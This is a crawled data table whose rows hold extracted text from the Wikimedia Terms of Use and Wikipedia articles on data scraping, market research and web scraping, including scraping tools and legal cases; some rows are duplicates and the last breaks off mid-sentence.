data, or actions of third parties, and you release us, our directors, officers, employees, and agents from any claims and damages, known and unknown, arising out of or in any way connected with any claim you have against any such third parties. No advice or information, whether oral or written, obtained by you from us or through or from our services creates any warranty not expressly stated in these Terms of Use. Any material downloaded or otherwise obtained through your use of our services is done at your own discretion and risk, and you will be solely responsible for any damage to your computer system or loss of data that results from the download of any such material. You agree that we have no responsibility or liability for the deletion of, or the failure to store or to transmit, any content or communication maintained by the service. We retain the right to create limits on use and storage at our sole discretion at any time with or without notice. Highlighted for emphasis Just as the Wikimedia community's input is essential for the growth and maintenance of the Projects, we believe that community input is essential for these Terms of Use to properly serve our users. It is also essential for a fair contract. Therefore, we will provide these Terms of Use, as well as any substantial future revisions of these Terms of Use, to the community for comment at least thirty (30) days before the end of the comment period. If a future proposed revision is substantial, we will provide an additional 30 days for comments after posting a translation of the proposed revision in at least three languages (selected at our discretion). The community will be encouraged to translate the proposed revision in other languages as appropriate. For changes for legal or administrative reasons, to correct an inaccurate statement, or changes in response to community comments, we will provide at least three (3) days' notice. Because it may be necessary to modify these Terms of Use from time to time, we will provide notice of such modifications and the opportunity to comment via the Project websites, and via a notification on WikimediaAnnounce-l. However, we ask that you please periodically review the most up-to-date version of these Terms of Use. Your continued use of our services after the new Terms of Use become official following the notice and review period constitutes an acceptance of these Terms of Use on your part. For the protection of the Wikimedia Foundation and other users like yourself, if you do not agree with our Terms of Use, you cannot use our services. These Terms of Use do not create an employment, agency, partnership, joint control or joint venture relationship between you and us, the Wikimedia Foundation. For the purposes of European Economic Area law, United Kingdom law, or other laws that involve a similar concept, you are not acting "under the authority of" the Foundation when you use the services. If you have not signed a separate agreement with us, these Terms of Use are the entire agreement between you and us. If there is any conflict between these Terms of Use and a signed written agreement between you and us, the signed agreement will control. You agree that we may provide you with notices, including those regarding changes to the Terms of Use, by email, regular mail, or postings on the Projects or Project Websites. If in any circumstance, we do not apply or enforce any provision of these Terms of Use, it is not a waiver of that provision. You understand that, unless otherwise agreed to in writing by us, you have no expectation of compensation for any activity, contribution, or idea that you provide to us, the community, or the Projects or Project editions. Notwithstanding any provision to the contrary in these Terms of Use, we (the Wikimedia Foundation) and you agree not to modify the applicable terms and requirements of any free license that is employed on the Projects or Project editions when such free license is authorized by these Terms of Use. These Terms of Use were written in English (U.S.). While we hope that translations of these Terms of Use are accurate, in the event of any differences in meaning between the original English version and a translation, the original English version takes precedence. If any provision or part of a provision of these Terms of Use is found unlawful, void, or unenforceable, that provision or part of the provision is deemed severable from these Terms of Use and will be enforced to the maximum extent permissible, and all other provisions of these Terms of Use will remain in full force and effect. We appreciate your taking the time to read these Terms of Use, and we are very happy to have you contributing to the Projects and using our services. Through your contributions, you are helping to build something really big not only an important collection of collaboratively edited reference Projects that provides education and information to millions who might otherwise lack access, but also a vibrant community of like-minded and engaged peers, focused on a very noble goal. These Terms of Use went into effect on June 7, 2023. Previous versions of the terms: Please note that in the event of any differences in meaning or interpretation between the original English version of this content and a translation, the original English version takes precedence. |
385 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
386 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Market_research | Market research is an organized effort to gather information about target markets and customers.It involves understanding who they are and what they need. 1 It is an important component of business strategy 2 and a major factor in maintaining competitiveness. Market research helps to identify and analyze the needs of the market, the market size and the competition. Its techniques encompass both qualitative techniques such as focus groups, in-depth interviews, and ethnography, as well as quantitative techniques such as customer surveys, and analysis of secondary data. It includes social and opinion research, and is the systematic gathering and interpretation of information about individuals or organizations using statistical and analytical methods and techniques of the applied social sciences to gain insight or support decision making. 3 Market research, marketing research, and marketing are a sequence of business activities; 4 5 sometimes these are handled informally. 6 The field of marketing research is much older than that of market research. 7 Although both involve consumers, Marketing research is concerned specifically about marketing processes, such as advertising effectiveness and salesforce effectiveness, while market research is concerned specifically with markets and distribution. 8 Two explanations given for confusing Market research with Marketing research are the similarity of the terms and also that Market Research is a subset of Marketing Research. 9 10 11 Further confusion exists because of major companies with expertise and practices in both areas. 12 Although market research started to be conceptualized and put into formal practice during the 1930s as an offshoot of the advertising boom of the Golden Age of radio in the United States, this was based on 1920s work by Daniel Starch. Starch "developed a theory that advertising had to be seen, read, believed, remembered, and most importantly, acted upon, in order to be considered effective. 13 Advertisers realized the significance of demographics by the patterns in which they sponsored different radio programs. citation needed The Gallup Organization helped invent the public opinion poll; today, "Market research is a way of paying for it. 14 Market research is a way of getting an overview of consumers' wants, needs and beliefs. It can also involve discovering how they act. The research can be used to determine how a product could be marketed. Peter Drucker believed 15 market research to be the quintessence of marketing. Market research is a way that producers and the marketplace study the consumer and gather information about the consumers' needs. There are two major types of market research: primary research, which is sub-divided into quantitative and qualitative research, and secondary research. Factors that can be investigated through market research include: Another factor that can be measured is marketing effectiveness. This includes: "Rigorous sampling methodologies combined with high-quality data collection" is what the magazine Advertising Age considers the backbone of market research. 18 Data collection can be done by observing customer behavior through in-situ studies or by processing e.g. log files, by interviewing customers, potential customers, stakeholders, or a sample of the general population. The data can be quantitative in nature (counting sales, clicks, eye-tracking) or qualitative (surveys, questionnaires, interviews, feedback). Aggregating, visualizing, and turning data into actionable insights is one of the major challenges of market research and today, text analytics affords market researches methods to process large amounts of qualitative information and turn it into quantitative data, which is easier to visualize and use for formalized decision making. 19 Data collection can use larger audience samples than the few hundred or thousand typically used in market research. 20 Also required is the (at least passive) 21 cooperation of those being surveyed; 22 trust 23 is also helpful. 24 Translation is an essential comprehension tool for global consumers and is not a simple act of replacing words in one language with words in another. 25 Some data collection is incentivized: a simple form is when those on the road contribute to traffic reporting of which they are consumers. More complex is the relationship of consumer-to-business (C2B), which sometimes introduces reliability problems. 26 Other data collection is to know more about the market, 27 which is the purpose of market research. 28 The international growth of available research both from and via the Internet 13 has influenced a vast number of consumers and those from whom they make purchases. 29 Although emerging global markets, such as China, Indonesia and Russia are still smaller than the US in B2B e-commerce, their internet-fueled growth factor is stimulated by product-enhancing websites, graphics, and content designed to attract corporate and consumer B2C shoppers. Estimates for 2010 show between US$400 billion and $600 billion in revenue was generated by this medium. A report titled "Global B2C E-Commerce and Online Payment Market 2014" indicated a decrease in overall growth rates in North America and Western Europe, even as absolute growth numbers rose. The UK Market Research Society (MRS) listed the top social media platforms primarily used by millennials are LinkedIn, Facebook, YouTube and Instagram. Regarding details for worldwide corporate market research, "most of them are never written about because they are the consumer research done by the country's manufacturers. 30 Also less written about is tailored translation approaches based on the expertise or resources available in the local country. 25 To mitigate implicit and unconscious bias in market research design, researchers have suggested conducting bias testing via interviewer-moderated technology-aided, unmoderated methods. 31 Market research data has loss prevention aspects; that less than 60 percent of all proposed modifications and new products are deemed failures. 30 When information about the market is difficult to acquire, and the cost of "going ahead with the decision" to offer the product or service is affordable, the research cost may be more profitably used "to ensure that the new line got the advertising send-off it needed to have the best chances of succeeding. 32 As measured in revenue, US based Amazon is the worldwide E-Commerce leader. The film industry is an example where the importance of testing film content and marketing material involves: Market research is an industry that overlaps with and is often referred to as the "insights" industry. 34 However, the distinctive methods and techniques of market research not always correspond to the digital-first approach of insights vendors. The emergence of insights focusing on data analytics rather than fieldwork is competing with market research for managerial attention and funding. Current research with market research practitioners shows two pressing concerns for the industry: online data commoditization and the increasing distance between market researchers and top management within client organizations. Both concerns boil down to the risk they perceived of market research becoming a legacy activity of the marketing department rather than the cornerstone of business strategy. 34 Market research aims to produce so-called "actionable knowledge" that firms find useful in their operations: 35 Small organizations and non-profits can derive needed information by observing the environment of their location. Small scale surveys and focus groups are low cost ways to gather information from potential and existing customers and donors. While secondary data (statistics, demographics, etc.) is available to the public in libraries or on the internet, primary sources, done well, can be quite valuable: talking for an hour each, to twelve people, two apiece from six potential clients, can "get inside their minds.. get a feel for their needs, wants and pain. You can't get that from a questionnaire. 36 This article incorporates public domain material from websites or documents of the Small Business Administration. |
387 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_scraping#cite_ref-7 | Data scraping is a technique where a computer program extracts data from human-readable output coming from another program. Normally, data transfer between programs is accomplished using data structures suited for automated processing by computers, not people. Such interchange formats and protocols are typically rigidly structured, well-documented, easily parsed, and minimize ambiguity. Very often, these transmissions are not human-readable at all. Thus, the key element that distinguishes data scraping from regular parsing is that the output being scraped is intended for display to an end-user, rather than as an input to another program. It is therefore usually neither documented nor structured for convenient parsing. Data scraping often involves ignoring binary data (usually images or multimedia data), display formatting, redundant labels, superfluous commentary, and other information which is either irrelevant or hinders automated processing. Data scraping is most often done either to interface to a legacy system, which has no other mechanism which is compatible with current hardware, or to interface to a third-party system which does not provide a more convenient API. In the second case, the operator of the third-party system will often see screen scraping as unwanted, due to reasons such as increased system load, the loss of advertisement revenue, or the loss of control of the information content. Data scraping is generally considered an ad hoc, inelegant technique, often used only as a "last resort" when no other mechanism for data interchange is available. Aside from the higher programming and processing overhead, output displays intended for human consumption often change structure frequently. Humans can cope with this easily, but a computer program will fail. Depending on the quality and the extent of error handling logic present in the computer, this failure can result in error messages, corrupted output or even program crashes. However, setting up a data scraping pipeline nowadays is straightforward, requiring minimal programming effort to meet practical needs (especially in biomedical data integration). 1 Although the use of physical "dumb terminal" IBM 3270s is slowly diminishing, as more and more mainframe applications acquire Web interfaces, some Web applications merely continue to use the technique of screen scraping to capture old screens and transfer the data to modern front-ends. 2 Screen scraping is normally associated with the programmatic collection of visual data from a source, instead of parsing data as in web scraping. Originally, screen scraping referred to the practice of reading text data from a computer display terminal's screen. This was generally done by reading the terminal's memory through its auxiliary port, or by connecting the terminal output port of one computer system to an input port on another. The term screen scraping is also commonly used to refer to the bidirectional exchange of data. This could be the simple cases where the controlling program navigates through the user interface, or more complex scenarios where the controlling program is entering data into an interface meant to be used by a human. As a concrete example of a classic screen scraper, consider a hypothetical legacy system dating from the 1960s—the dawn of computerized data processing. Computer to user interfaces from that era were often simply text-based dumb terminals which were not much more than virtual teleprinters (such systems are still in use today update , for various reasons). The desire to interface such a system to more modern systems is common. A robust solution will often require things no longer available, such as source code, system documentation, APIs, or programmers with experience in a 50 year-old computer system. In such cases, the only feasible solution may be to write a screen scraper that "pretends" to be a user at a terminal. The screen scraper might connect to the legacy system via Telnet, emulate the keystrokes needed to navigate the old user interface, process the resulting display output, extract the desired data, and pass it on to the modern system. A sophisticated and resilient implementation of this kind, built on a platform providing the governance and control required by a major enterprise—e.g. change control, security, user management, data protection, operational audit, load balancing, and queue management, etc.—could be said to be an example of robotic process automation software, called RPA or RPAAI for self-guided RPA 2.0 based on artificial intelligence. In the 1980s, financial data providers such as Reuters, Telerate, and Quotron displayed data in 24 80 format intended for a human reader. Users of this data, particularly investment banks, wrote applications to capture and convert this character data as numeric data for inclusion into calculations for trading decisions without re-keying the data. The common term for this practice, especially in the United Kingdom, was page shredding, since the results could be imagined to have passed through a paper shredder. Internally Reuters used the term 'logicized' for this conversion process, running a sophisticated computer system on VAX VMS called the Logicizer. 3 More modern screen scraping techniques include capturing the bitmap data from the screen and running it through an OCR engine, or for some specialised automated testing systems, matching the screen's bitmap data against expected results. 4 This can be combined in the case of GUI applications, with querying the graphical controls by programmatically obtaining references to their underlying programming objects. A sequence of screens is automatically captured and converted into a database. Another modern adaptation to these techniques is to use, instead of a sequence of screens as input, a set of images or PDF files, so there are some overlaps with generic "document scraping" and report mining techniques. There are many tools that can be used for screen scraping. 5 Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. Because of this, tool kits that scrape web content were created. A web scraper is an API or tool to extract data from a website. 6 Companies like Amazon AWS and Google provide web scraping tools, services, and public data available free of cost to end-users. Newer forms of web scraping involve listening to data feeds from web servers. For example, JSON is commonly used as a transport storage mechanism between the client and the webserver. A web scraper uses a website's URL to extract data, and stores this data for subsequent analysis. This method of web scraping enables the extraction of data in an efficient and accurate manner. 7 Recently, companies have developed web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate the human processing that occurs when viewing a webpage to automatically extract useful information. 8 9 Large websites usually use defensive algorithms to protect their data from web scrapers and to limit the number of requests an IP or IP network may send. This has caused an ongoing battle between website developers and scraping developers. 10 Report mining is the extraction of data from human-readable computer reports. Conventional data extraction requires a connection to a working source system, suitable connectivity standards or an API, and usually complex querying. By using the source system's standard reporting options, and directing the output to a spool file instead of to a printer, static reports can be generated suitable for offline analysis via report mining. 11 This approach can avoid intensive CPU usage during business hours, can minimise end-user licence costs for ERP customers, and can offer very rapid prototyping and development of custom reports. Whereas data scraping and web scraping involve interacting with dynamic output, report mining involves extracting data from files in a human-readable format, such as HTML, PDF, or text. These can be easily generated from almost any system by intercepting the data feed to a printer. This approach can provide a quick and simple route to obtaining data without the need to program an API to the source system. |
388 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_note-28 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking online presence and reputation, web mashup, and web data integration. Web pages are built using text-based mark-up languages (HTML and XHTML), and frequently contain a wealth of useful data in text form. However, most web pages are designed for human end-users and not for ease of automated use. As a result, specialized tools and software have been developed to facilitate the scraping of web pages. Web scraping applications include market research, price comparison, content monitoring, and more. Businesses rely on web scraping services to efficiently gather and utilize this data. Newer forms of web scraping involve monitoring data feeds from web servers. For example, JSON is commonly used as a transport mechanism between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting and disallowing bots from crawling (viewing) their pages. In response, there are web scraping systems that rely on using techniques in DOM parsing, computer vision and natural language processing to simulate human browsing to enable gathering web page content for offline parsing Web scraping is the process of automatically mining data or collecting information from the World Wide Web. It is a field with active developments sharing a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence and human-computer interactions. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web-scraping technology cannot replace a human's manual examination and copy-and-paste, and sometimes this may be the only workable solution when the websites for scraping explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extract information from web pages can be based on the UNIX grep command or regular expression-matching facilities of programming languages (for instance Perl or Python). Static and dynamic web pages can be retrieved by posting HTTP requests to the remote web server using socket programming. Many websites have large collections of pages generated dynamically from an underlying structured source like a database. Data of the same category are typically encoded into similar pages by a common script or template. In data mining, a program that detects such templates in a particular information source, extracts its content, and translates it into a relational form, is called a wrapper. Wrapper generation algorithms assume that input pages of a wrapper induction system conform to a common template and that they can be easily identified in terms of a URL common scheme. 3 Moreover, some semi-structured data query languages, such as XQuery and the HTQL, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as the Internet Explorer or the Mozilla browser control, programs can retrieve the dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, based on which programs can retrieve parts of the pages. Languages such as Xpath can be used to parse the resulting DOM tree. There are several companies that have developed vertical specific harvesting platforms. These platforms create and monitor a multitude of "bots" for specific verticals with no "man in the loop" (no direct human involvement), and no work related to a specific target site. The preparation involves establishing the knowledge base for the entire vertical and then the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually number of fields) and its scalability (how quick it can scale up to hundreds or thousands of sites). This scalability is mostly used to target the Long Tail of sites that common aggregators find complicated or too labor-intensive to harvest content from. The pages being scraped may embrace metadata or semantic markups and annotations, which can be used to locate specific data snippets. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing. In another case, the annotations, organized into a semantic layer, 4 are stored and managed separately from the web pages, so the scrapers can retrieve data schema and instructions from this layer before scraping the pages. There are efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually as a human being might. 5 Uses advanced AI to interpret and process web page content contextually, extracting relevant information, transforming data, and customizing outputs based on the content's structure and meaning. This method enables more intelligent and flexible data extraction, accommodating complex and dynamic web content. The world of web scraping offers a variety of software tools designed to simplify and customize the process of data extraction from websites. These tools vary in their approach and capabilities, making web scraping accessible to both novice users and advanced programmers. Some advanced web scraping software can automatically recognize the data structure of a web page, eliminating the need for manual coding. Others provide a recording interface that allows users to record their interactions with a website, thus creating a scraping script without writing a single line of code. Many tools also include scripting functions for more customized extraction and transformation of content, along with database interfaces to store the scraped data locally. Web scraping tools are versatile in their functionality. Some can directly extract data from APIs, while others are capable of handling websites with AJAX-based dynamic content loading or login requirements. Point-and-click software, for instance, empowers users without advanced coding skills to benefit from web scraping. This democratizes access to data, making it easier for a broader audience to leverage the power of web scraping. Popular Web Scraping Tools BeautifulSoup: A Python library that provides simple methods for extracting data from HTML and XML files. Scrapy: An open-source and collaborative web crawling framework for Python that allows you to extract the data, process it, and store it. Octoparse: A no-code web scraping tool that offers a user-friendly interface for extracting data from websites without needing programming skills. ParseHub: Another no-code web scraper that can handle dynamic content and works with AJAX-loaded sites. Apify: A platform that offers a wide range of scraping tools and the ability to create custom scrapers. InstantAPI.ai: An AI-powered tool that transforms any web page into personalized APIs instantly, offering advanced data extraction and customization. Some platforms provide not only tools for web scraping but also opportunities for developers to share and potentially monetize their scraping solutions. By leveraging these tools and platforms, users can unlock the full potential of web scraping, turning raw data into valuable insights and opportunities. 6 The legality of web scraping varies across the world. In general, web scraping may be against the terms of service of some websites, but the enforceability of these terms is unclear. 7 In the United States, website owners can use three major legal claims to prevent undesired web scraping: (1) copyright infringement (compilation), (2) violation of the Computer Fraud and Abuse Act ("CFAA"), and (3) trespass to chattel. 8 However, the effectiveness of these claims relies upon meeting various criteria, and the case law is still evolving. For example, with regard to copyright, while outright duplication of original expression will in many cases be illegal, in the United States the courts ruled in Feist Publications v. Rural Telephone Service that duplication of facts is allowable. U.S. courts have acknowledged that users of "scrapers" or "robots" may be held liable for committing trespass to chattels, 9 10 which involves a computer system itself being considered personal property upon which the user of a scraper is trespassing. The best known of these cases, eBay v. Bidder's Edge, resulted in an injunction ordering Bidder's Edge to stop accessing, collecting, and indexing auctions from the eBay web site. This case involved automatic placing of bids, known as auction sniping. However, in order to succeed on a claim of trespass to chattels, the plaintiff must demonstrate that the defendant intentionally and without authorization interfered with the plaintiff's possessory interest in the computer system and that the defendant's unauthorized use caused damage to the plaintiff. Not all cases of web spidering brought before the courts have been considered trespass to chattels. 11 One of the first major tests of screen scraping involved American Airlines (AA), and a firm called FareChase. 12 AA successfully obtained an injunction from a Texas trial court, stopping FareChase from selling software that enables users to compare online fares if the software also searches AA's website. The airline argued that FareChase's websearch software trespassed on AA's servers when it collected the publicly available data. FareChase filed an appeal in March 2003. By June, FareChase and AA agreed to settle and the appeal was dropped. 13 Southwest Airlines has also challenged screen-scraping practices, and has involved both FareChase and another firm, Outtask, in a legal claim. Southwest Airlines charged that the screen-scraping is Illegal since it is an example of "Computer Fraud and Abuse" and has led to "Damage and Loss" and "Unauthorized Access" of Southwest's site. It also constitutes "Interference with Business Relations", "Trespass", and "Harmful Access by Computer". They also claimed that screen-scraping constitutes what is legally known as "Misappropriation and Unjust Enrichment", as well as being a breach of the web site's user agreement. Outtask denied all these claims, claiming that the prevailing law, in this case, should be US Copyright law and that under copyright, the pieces of information being scraped would not be subject to copyright protection. Although the cases were never resolved in the Supreme Court of the United States, FareChase was eventually shuttered by parent company Yahoo , and Outtask was purchased by travel expense company Concur. 14 In 2012, a startup called 3Taps scraped classified housing ads from Craigslist. Craigslist sent 3Taps a cease-and-desist letter and blocked their IP addresses and later sued, in Craigslist v. 3Taps. The court held that the cease-and-desist letter and IP blocking was sufficient for Craigslist to properly claim that 3Taps had violated the Computer Fraud and Abuse Act (CFAA). Although these are early scraping decisions, and the theories of liability are not uniform, it is difficult to ignore a pattern emerging that the courts are prepared to protect proprietary content on commercial sites from uses which are undesirable to the owners of such sites. However, the degree of protection for such content is not settled and will depend on the type of access made by the scraper, the amount of information accessed and copied, the degree to which the access adversely affects the site owner's system and the types and manner of prohibitions on such conduct. 15 While the law in this area becomes more settled, entities contemplating using scraping programs to access a public web site should also consider whether such action is authorized by reviewing the terms of use and other terms or notices posted on or made available through the site. In a 2010 ruling in the Cvent, Inc. v. Eventbrite, Inc. In the United States district court for the eastern district of Virginia, the court ruled that the terms of use should be brought to the users' attention In order for a browse wrap contract or license to be enforced. 16 In a 2014 case, filed in the United States District Court for the Eastern District of Pennsylvania, 17 e-commerce site QVC objected to the Pinterest-like shopping aggregator Resultly's 'scraping of QVC's site for real-time pricing data. QVC alleges that Resultly "excessively crawled" QVC's retail site (allegedly sending 200 300 search requests to QVC's website per minute, sometimes to up to 36,000 requests per minute) which caused QVC's site to crash for two days, resulting in lost sales for QVC. 18 QVC's complaint alleges that the defendant disguised its web crawler to mask its source IP address and thus prevented QVC from quickly repairing the problem. This is a particularly interesting scraping case because QVC is seeking damages for the unavailability of their website, which QVC claims was caused by Resultly. In the plaintiff's web site during the period of this trial, the terms of use link are displayed among all the links of the site, at the bottom of the page as most sites on the internet. This ruling contradicts the Irish ruling described below. The court also rejected the plaintiff's argument that the browse-wrap restrictions were enforceable in view of Virginia's adoption of the Uniform Computer Information Transactions Act (UCITA)—a uniform law that many believed was in favor on common browse-wrap contracting practices. 19 In Facebook, Inc. v. Power Ventures, Inc., a district court ruled in 2012 that Power Ventures could not scrape Facebook pages on behalf of a Facebook user. The case is on appeal, and the Electronic Frontier Foundation filed a brief in 2015 asking that it be overturned. 20 21 In Associated Press v. Meltwater U.S. Holdings, Inc., a court in the US held Meltwater liable for scraping and republishing news information from the Associated Press, but a court in the United Kingdom held in favor of Meltwater. The Ninth Circuit ruled in 2019 that web scraping did not violate the CFAA in hiQ Labs v. LinkedIn. The case was appealed to the United States Supreme Court, which returned the case to the Ninth Circuit to reconsider the case in light of the 2021 Supreme Court decision in Van Buren v. United States which narrowed the applicability of the CFAA. 22 On this review, the Ninth Circuit upheld their prior decision. 23 Internet Archive collects and distributes a significant number of publicly available web pages without being considered to be in violation of copyright laws. citation needed In February 2006, the Danish Maritime and Commercial Court (Copenhagen) ruled that systematic crawling, indexing, and deep linking by portal site ofir.dk of real estate site Home.dk does not conflict with Danish law or the database directive of the European Union. 24 In a February 2010 case complicated by matters of jurisdiction, Ireland's High Court delivered a verdict that illustrates the inchoate state of developing case law. In the case of Ryanair Ltd v Billigfluege.de GmbH, Ireland's High Court ruled Ryanair's "click-wrap" agreement to be legally binding. In contrast to the findings of the United States District Court Eastern District of Virginia and those of the Danish Maritime and Commercial Court, Justice Michael Hanna ruled that the hyperlink to Ryanair's terms and conditions was plainly visible, and that placing the onus on the user to agree to terms and conditions in order to gain access to online services is sufficient to comprise a contractual relationship. 25 The decision is under appeal in Ireland's Supreme Court. 26 On April 30, 2020, the French Data Protection Authority (CNIL) released new guidelines on web scraping. 27 The CNIL guidelines made it clear that publicly available data is still personal data and cannot be repurposed without the knowledge of the person to whom that data belongs. 28 In Australia, the Spam Act 2003 outlaws some forms of web harvesting, although this only applies to email addresses. 29 30 Leaving a few cases dealing with IPR infringement, Indian courts have not expressly ruled on the legality of web scraping. However, since all common forms of electronic contracts are enforceable in India, violating the terms of use prohibiting data scraping will be a violation of the contract law. It will also violate the Information Technology Act, 2000, which penalizes unauthorized access to a computer resource or extracting data from a computer resource. The administrator of a website can use various measures to stop or slow a bot. Some techniques include: |
389 | https://en.wikipedia.org/wiki/Web_scraping | https://en.wikipedia.org/wiki/Web_scraping#cite_ref-impervawp2011_14-0 | Web scraping, web harvesting, or web data extraction is data scraping used for extracting data from websites. 1 Web scraping software may directly access the World Wide Web using the Hypertext Transfer Protocol or a web browser. While web scraping can be done manually by a software user, the term typically refers to automated processes implemented using a bot or web crawler. It is a form of copying in which specific data is gathered and copied from the web, typically into a central local database or spreadsheet, for later retrieval or analysis. Scraping a web page involves fetching it and extracting from it. Fetching is the downloading of a page (which a browser does when a user views a page). Therefore, web crawling is a main component of web scraping, to fetch pages for later processing. Once fetched, extraction can take place. The content of a page may be parsed, searched and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page, to make use of it for another purpose somewhere else. An example would be finding and copying names and telephone numbers, companies and their URLs, or e-mail addresses to a list (contact scraping). As well as contact scraping, web scraping is used as a component of applications used for web indexing, web mining and data mining, online price change monitoring and price comparison, product review scraping (to watch the competition), gathering real estate listings, weather data monitoring, website change detection, research, tracking 